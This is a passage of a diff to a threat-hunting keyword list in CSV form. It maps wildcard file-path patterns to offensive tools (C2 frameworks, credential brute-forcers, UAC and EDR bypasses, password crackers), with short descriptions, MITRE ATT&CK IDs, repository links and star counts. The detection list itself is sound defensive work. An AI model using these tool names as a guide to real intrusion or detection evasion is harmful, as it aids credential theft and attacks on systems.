more","T1110.003 - T1059.005 - T1071.001","TA0001 - TA0002","N/A","N/A","Credential Access","https://github.com/blacklanternsecurity/TREVORspray","1","0","N/A","10","8","797","127","2023-09-15T23:01:06Z","2020-09-06T23:02:37Z" +"*/TriggerLinux/*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. 
Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","0","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*/trollsploit/*","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1154","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*/TROUBLE-1/Vajra*","offensive_tool_keyword","Vajra","Vajra is a UI based tool with multiple techniques for attacking and enumerating in target's Azure environment","T1087 - T1098 - T1583 - T1078 - T1110 - T1566 - T1537 - T1020 - T1526 - T1482","TA0003 - TA0006 - TA0007 - TA0008 - TA0009","N/A","N/A","Exploitation tools","https://github.com/TROUBLE-1/Vajra","1","1","N/A","N/A","4","336","57","2023-03-16T09:45:53Z","2022-03-01T14:31:27Z" -"*/trusted_sec_bofs/*","offensive_tool_keyword","mythic","Athena is a fully-featured cross-platform agent designed using the .NET 6. 
Athena is designed for Mythic 2.2 and newer","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1106 - T1107 - T1112 - T1204 - T1566","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/Athena","1","1","N/A","10","10","137","32","2023-10-03T16:51:44Z","2022-01-24T20:44:38Z" -"*/trusted_sec_remote_bofs/*","offensive_tool_keyword","mythic","Athena is a fully-featured cross-platform agent designed using the .NET 6. Athena is designed for Mythic 2.2 and newer","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1106 - T1107 - T1112 - T1204 - T1566","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/Athena","1","1","N/A","10","10","137","32","2023-10-03T16:51:44Z","2022-01-24T20:44:38Z" +"*/trusted_sec_bofs/*","offensive_tool_keyword","mythic","Athena is a fully-featured cross-platform agent designed using the .NET 6. Athena is designed for Mythic 2.2 and newer","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1106 - T1107 - T1112 - T1204 - T1566","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/Athena","1","1","N/A","10","10","137","32","2023-10-04T12:36:29Z","2022-01-24T20:44:38Z" +"*/trusted_sec_remote_bofs/*","offensive_tool_keyword","mythic","Athena is a fully-featured cross-platform agent designed using the .NET 6. 
Athena is designed for Mythic 2.2 and newer","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1106 - T1107 - T1112 - T1204 - T1566","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/Athena","1","1","N/A","10","10","137","32","2023-10-04T12:36:29Z","2022-01-24T20:44:38Z" "*/trustedsec/*","offensive_tool_keyword","Github Username","github repo hosting various exploitation tools","N/A","N/A","N/A","N/A","Exploitation tools","https://github.com/trustedsec","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/tso-brute.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/tso-enum.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" -"*/tweetshell.sh*","offensive_tool_keyword","SocialBox-Termux","SocialBox is a Bruteforce Attack Framework Facebook - Gmail - Instagram - Twitter for termux on android","T1110.001 - T1110.003 - T1078.003","TA0001 - TA0006 - TA0040","N/A","N/A","Credential Access","https://github.com/samsesh/SocialBox-Termux","1","1","N/A","7","10","2417","268","2023-07-14T10:59:10Z","2019-03-28T18:07:05Z" -"*/twittor.git*","offensive_tool_keyword","twittor","A fully featured backdoor that uses Twitter as a C&C server ","T1105 - T1102 - T1041","TA0003 - TA0002 - TA0007","N/A","N/A","C2","https://github.com/PaulSec/twittor","1","1","N/A","10","10","743","253","2020-09-30T13:47:31Z","2015-09-09T07:23:25Z" +"*/tweetshell.sh*","offensive_tool_keyword","SocialBox-Termux","SocialBox is a Bruteforce Attack Framework Facebook - Gmail - Instagram - Twitter for termux on android","T1110.001 - T1110.003 - T1078.003","TA0001 - TA0006 - TA0040","N/A","N/A","Credential Access","https://github.com/samsesh/SocialBox-Termux","1","1","N/A","7","10","2419","268","2023-07-14T10:59:10Z","2019-03-28T18:07:05Z" +"*/twittor.git*","offensive_tool_keyword","twittor","A fully featured backdoor that uses Twitter as a C&C server ","T1105 - T1102 - T1041","TA0003 - TA0002 - TA0007","N/A","N/A","C2","https://github.com/PaulSec/twittor","1","1","N/A","10","10","743","254","2020-09-30T13:47:31Z","2015-09-09T07:23:25Z" +"*/uac.py*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - 
TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","1","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z" "*/UACBypasses/*","offensive_tool_keyword","mythic","A .NET Framework 4.0 Windows Agent","T1021 - T1021.002 - T1022 - T1032 - T1043 - T1055 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1140 - T1204 - T1205","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/Apollo/","1","1","N/A","10","10","401","83","2023-08-17T14:46:04Z","2020-11-09T08:05:16Z" -"*/UACME.git*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5486","1277","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" -"*/UAC-SilentClean/*","offensive_tool_keyword","cobaltstrike","New UAC bypass for Silent Cleanup for CobaltStrike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - 
APT29","C2","https://github.com/EncodeGroup/UAC-SilentClean","1","1","N/A","10","10","173","32","2021-07-14T13:51:02Z","2020-10-07T13:25:21Z" +"*/UACME.git*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5488","1278","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" +"*/UAC-SilentClean/*","offensive_tool_keyword","cobaltstrike","New UAC bypass for Silent Cleanup for CobaltStrike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/EncodeGroup/UAC-SilentClean","1","1","N/A","10","10","174","32","2021-07-14T13:51:02Z","2020-10-07T13:25:21Z" "*/uberfile.py*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation 
tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" "*/ubiquiti-discovery.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/udmp-parser.git*","offensive_tool_keyword","udmp-parser","A Cross-Platform C++ parser library for Windows user minidumps.","T1005 - T1059.003 - T1027.002","TA0009 - TA0005 - TA0040","N/A","N/A","Credential Access","https://github.com/0vercl0k/udmp-parser","1","1","N/A","6","2","160","22","2023-08-27T18:30:24Z","2022-01-30T18:56:21Z" 
@@ -5671,24 +5733,24 @@ "*/unhook-bof*","offensive_tool_keyword","C2 related tools","Thread Stack Spoofing - PoC for an advanced In-Memory evasion technique allowing to better hide injected shellcode's memory allocation from scanners and analysts.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","N/A","C2","https://github.com/mgeeky/ThreadStackSpoofer","1","1","N/A","10","10","875","158","2022-06-17T18:06:35Z","2021-09-26T22:48:17Z" "*/unhook-bof*","offensive_tool_keyword","cobaltstrike","Remove API hooks from a Beacon process.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - 
APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/rsmudge/unhook-bof","1","1","N/A","10","10","240","61","2021-09-18T18:12:41Z","2021-01-13T02:20:44Z" "*/unhook-bof*","offensive_tool_keyword","cobaltstrike","Remove API hooks from a Beacon process.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Cobalt-Strike/unhook-bof","1","1","N/A","10","10","51","14","2022-03-13T15:57:10Z","2021-07-02T14:55:38Z" -"*/UnhookingPatch.git*","offensive_tool_keyword","UnhookingPatch","Bypass EDR Hooks by patching NT API stub and resolving SSNs and syscall instructions at runtime","T1055 - T1055.001 - T1070 - T1070.004 - T1211","TA0005","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/UnhookingPatch","1","1","N/A","9","3","259","43","2023-08-02T02:25:38Z","2023-02-08T16:21:03Z" +"*/UnhookingPatch.git*","offensive_tool_keyword","UnhookingPatch","Bypass EDR Hooks by 
patching NT API stub and resolving SSNs and syscall instructions at runtime","T1055 - T1055.001 - T1070 - T1070.004 - T1211","TA0005","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/UnhookingPatch","1","1","N/A","9","3","260","43","2023-08-02T02:25:38Z","2023-02-08T16:21:03Z" "*/unicorn.git*","offensive_tool_keyword","unicorn","Unicorn is a simple tool for using a PowerShell downgrade attack and inject shellcode straight into memory","T1059.001 - T1055.012 - T1027.002 - T1547.009","TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation tools","https://github.com/trustedsec/unicorn","1","1","N/A","N/A","10","3503","839","2023-09-15T05:43:27Z","2013-06-19T08:38:06Z" "*/unicorn.py*","offensive_tool_keyword","unicorn","Unicorn is a simple tool for using a PowerShell downgrade attack and inject shellcode straight into memory","T1059.001 - T1055.012 - T1027.002 - T1547.009","TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation tools","https://github.com/trustedsec/unicorn","1","1","N/A","N/A","10","3503","839","2023-09-15T05:43:27Z","2013-06-19T08:38:06Z" "*/unittest.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" -"*/unshackle.git*","offensive_tool_keyword","unshackle","Unshackle is an open-source tool to bypass Windows and Linux user passwords from a bootable USB based on Linux","T1110.004 - T1059.004 - T1070.004","TA0006 - TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/Fadi002/unshackle","1","1","N/A","10","10","1482","83","2023-09-23T15:54:14Z","2023-07-19T22:30:28Z" -"*/unshackle.modules*","offensive_tool_keyword","unshackle","Unshackle is an open-source tool to bypass Windows and Linux user passwords from a bootable USB based on Linux","T1110.004 - T1059.004 - T1070.004","TA0006 - TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/Fadi002/unshackle","1","0","N/A","10","10","1482","83","2023-09-23T15:54:14Z","2023-07-19T22:30:28Z" -"*/unused/locktest.sh*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8293","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" -"*/unused/Yosemite.patch*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8293","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"*/unshackle.git*","offensive_tool_keyword","unshackle","Unshackle is an open-source tool to bypass Windows and Linux user passwords from a bootable USB based on Linux","T1110.004 - T1059.004 - T1070.004","TA0006 - TA0002 - TA0005","N/A","N/A","Defense 
Evasion","https://github.com/Fadi002/unshackle","1","1","N/A","10","10","1485","84","2023-09-23T15:54:14Z","2023-07-19T22:30:28Z" +"*/unshackle.modules*","offensive_tool_keyword","unshackle","Unshackle is an open-source tool to bypass Windows and Linux user passwords from a bootable USB based on Linux","T1110.004 - T1059.004 - T1070.004","TA0006 - TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/Fadi002/unshackle","1","0","N/A","10","10","1485","84","2023-09-23T15:54:14Z","2023-07-19T22:30:28Z" +"*/unused/locktest.sh*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"*/unused/Yosemite.patch*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" "*/unusual-port.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/upnp-info.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/uptime-agent-info.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/url-snarf.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/user_data/*/keylog.txt*","offensive_tool_keyword","cuddlephish","Weaponized Browser-in-the-Middle (BitM) for Penetration Testers","T1185 - T1185.002 - T1071 - T1071.001 - T1556 - T1556.001","TA0009 - TA0006","N/A","N/A","Sniffing & Spoofing","https://github.com/fkasler/cuddlephish","1","1","N/A","10","2","152","10","2023-09-06T12:25:08Z","2023-08-02T14:30:41Z" -"*/userenum.go*","offensive_tool_keyword","kerbrute","A tool to perform Kerberos pre-auth bruteforcing","T1110","TA0006","N/A","N/A","Credential Access","https://github.com/ropnop/kerbrute","1","1","N/A","N/A","10","2144","368","2023-08-10T00:25:23Z","2019-02-03T18:21:17Z" -"*/UserlandBypass/*.c*","offensive_tool_keyword","EDRSandblast-GodFault","Integrates GodFault into EDR Sandblast achieving the same result without the use of any vulnerable 
drivers.","T1547.002 - T1055.001 - T1205","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/gabriellandau/EDRSandblast-GodFault","1","0","N/A","10","2","180","34","2023-08-28T18:14:20Z","2023-06-01T19:32:09Z" +"*/userenum.go*","offensive_tool_keyword","kerbrute","A tool to perform Kerberos pre-auth bruteforcing","T1110","TA0006","N/A","N/A","Credential Access","https://github.com/ropnop/kerbrute","1","1","N/A","N/A","10","2145","368","2023-08-10T00:25:23Z","2019-02-03T18:21:17Z" +"*/UserlandBypass/*.c*","offensive_tool_keyword","EDRSandblast-GodFault","Integrates GodFault into EDR Sandblast achieving the same result without the use of any vulnerable drivers.","T1547.002 - T1055.001 - T1205","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/gabriellandau/EDRSandblast-GodFault","1","0","N/A","10","2","183","35","2023-08-28T18:14:20Z","2023-06-01T19:32:09Z" "*/username-anarchy*","offensive_tool_keyword","username-anarchy","Tools for generating usernames when penetration testing. Usernames are half the password brute force problem.","T1110 - T1134 - T1078","TA0006","N/A","N/A","Credential Access","https://github.com/urbanadventurer/username-anarchy","1","1","N/A","N/A","6","564","113","2022-01-26T18:34:02Z","2012-11-07T05:35:10Z" "*/UserNamespaceOverlayfsSetuidWriteExec/*","offensive_tool_keyword","linux-exploit-suggester","Linux privilege escalation auditing tool","T1078 - T1068 - T1055","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/The-Z-Labs/linux-exploit-suggester","1","0","N/A","10","10","4725","1055","2023-08-18T17:29:23Z","2016-10-06T21:55:51Z" -"*/usniper.py*","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. 
Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","10","10","7841","1826","2023-08-28T13:08:08Z","2015-09-21T17:30:53Z" +"*/usniper.py*","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","10","10","7843","1826","2023-08-28T13:08:08Z","2015-09-21T17:30:53Z" "*/usr/bin/pkexec*","offensive_tool_keyword","POC","Exploit for the pwnkit vulnerability (https://www.qualys.com/2022/01/25/cve-2021-4034/pwnkit.txt) from the Qualys team","T1068","TA0004","N/A","N/A","Exploitation tools","https://github.com/Ayrx/CVE-2021-4034","1","1","N/A","N/A","1","97","16","2022-01-27T11:57:05Z","2022-01-26T03:33:47Z" "*/usr/bin/polenum*","offensive_tool_keyword","polenum","Uses Impacket Library to get the password policy from a windows machine","T1012 - T1596","TA0009 - TA0007","N/A","N/A","Discovery","https://salsa.debian.org/pkg-security-team/polenum","1","0","N/A","8","10","N/A","N/A","N/A","N/A" 
"*/usr/local/bin/exegol*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" 
@@ -5696,13 +5758,14 @@ "*/usr/share/cobaltstrike/*","offensive_tool_keyword","C2concealer","C2concealer is a command line tool that generates randomized C2 malleable profiles for use in Cobalt Strike.","T1090 - T1090.003 - T1027 - T1027.005 - T1071 - T1071.001","TA0042 - TA0005 - TA0011","N/A","N/A","C2","https://github.com/RedSiege/C2concealer","1","0","N/A","10","10","850","162","2021-09-26T16:37:06Z","2020-03-23T14:13:16Z" "*/usr/share/wordlists/*.txt*","offensive_tool_keyword","fcrackzip","a Free/Fast Zip Password Cracker","T1473 - T1021.002","TA0005 - TA0008","N/A","N/A","Credential Access","https://manpages.ubuntu.com/manpages/trusty/man1/fcrackzip.1.html","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/utils/addcomputer.py*","offensive_tool_keyword","sam-the-admin","script used in the POC exploitation for CVE-2021-42278 and CVE-2021-42287 to impersonate DA from standard domain user","T1208 - T1218.005 - T1055.002","TA0006 - TA0007 - TA0008","N/A","N/A","Exploitation 